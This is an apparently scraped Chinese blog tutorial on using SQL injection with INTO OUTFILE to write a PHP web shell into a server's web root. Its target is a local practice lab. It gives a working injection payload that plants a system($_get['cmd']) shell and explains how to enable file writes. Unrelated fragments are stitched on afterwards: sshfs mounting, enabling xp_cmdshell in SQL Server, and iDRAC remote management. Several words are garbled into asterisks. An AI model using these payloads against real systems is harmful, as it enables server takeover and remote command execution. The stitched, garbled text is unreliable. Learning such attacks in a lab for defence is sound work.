通過sql inject漏洞寫入惡意**需要三個前提:
1.需要知道遠端目錄,就是你的用php語言寫的**的那個存放php檔案的路徑,我的是在這裡e:\phpstudy\phptutorial\www。關於這個路徑,我在這裡詳細說一下,對於小小白,有基礎的請跳過這段。
這個目錄是我們本地伺服器訪問的目錄,比如,我在我的這個目錄下新建了乙個php檔案,名字叫helloworld,然後我在這個php檔案中寫這樣一段**
然後在我的瀏覽器位址上輸入:
127.0.0.1/helloworld.php
這裡的127.0.0.1/就相當於我的e:\phpstudy\phptutorial\www,在這個目錄下開啟helloworld.php檔案,並執行裡邊的**!
效果如下圖:
這裡說這個的意思就是,這個就是通過sqli進行伺服器的遠端控制的原理,在這個目錄中的php檔案html檔案或者其他類似的檔案,你可以從網頁上訪問到,並且!並且執行裡邊的**!!!
2.需要遠端目錄有些許可權
select "你想要寫入並且讓目標計算機執行的**" into outfile "上面說的那個目錄,目標計算機的那個目錄"
3.目標計算機資料庫開啟secure_file_priv應為我們是以我們自己的計算機作為目標計算機,所以,我們找到在mysql目錄下的my配置檔案(這個配置檔案有不同的字尾,我的是ini,有的是cnf)在這個配置檔案中新增一行新的**:
secure_file_priv=
如下圖:
輸入完後記得儲存,還有,重啟伺服器!
然後從該圖的右邊可以看到,在資料庫中輸入:
show global variables like 『%secure%』
secure_file_priv的右邊從null變成了 空 。ok,第三個條件也滿足了。
如果沒有開啟這個,則會出現這個情況:
實際操作
1.首先現在頁面輸入我們構造的sql語句:
kobe' union select "<?php system($_get['cmd'])?>",2 into outfile "e:/phpstudy/phptutorial/www/virus.php"#
(我選擇的是字元型注入的訓練靶場)
提交給前端得到:
這裡雖然warming,但是它已經執行了這個操作:(在最下面)
我們開啟相對應的目錄:
看到沒,我們上面寫的virus.php檔案出現了,在此之前本資料夾裡是沒有的!
這裡說乙個小問題:如果該目錄已經存在同樣的檔案,那麼他會這樣:
因為我的語句是
kobe' union select "<?php system($_get['cmd'])?>",2 into outfile "e:/phpstudy/phptutorial/www/virus.php"#
所以我現在可以通過網頁來操作目標計算機的cmd命令列了!!效果圖:
從上圖可以看到,在網頁上輸入的語句得到的資訊和在目標計算機的cmd上輸入的語句得到的資訊是完全一樣的!
有乙個需要注意的地方,那個如果路徑裡邊的斜槓是正斜槓,而直接從路徑上複製下來的是反斜槓,這裡需要更改一下。
通過sshfs掛載遠端伺服器目錄
sshfs是基於fuse構建的ssh檔案系統客戶端程式,通過ssh協議來掛載遠端檔案系統,方便而且安全 首先我們需要安裝fuse for macos和sshfs address 或者通過brew來進行安裝 brew cask install osxfuse brew install sshfs接下來...
通過sqlserver使用者操作遠端伺服器
use master goreconfigure 先執行一次重新整理,處理上次的配置 goexec sp configure show advanced options 1 啟用xp cmdshell的高階配置 goreconfigure 重新整理配置 goexec sp configure xp ...
不同的伺服器品牌遠端控制管理
參考 什麼是idrac呢?idrac又稱為integrated dell remote access controller,也就是整合戴爾遠端控制卡,這是戴爾伺服器的獨有功能,idrac卡相當於是附加在伺服器上的一計算機,可以實現一對一的伺服器遠端管理與監控,通過與伺服器主機板上的管理晶元bmc進行...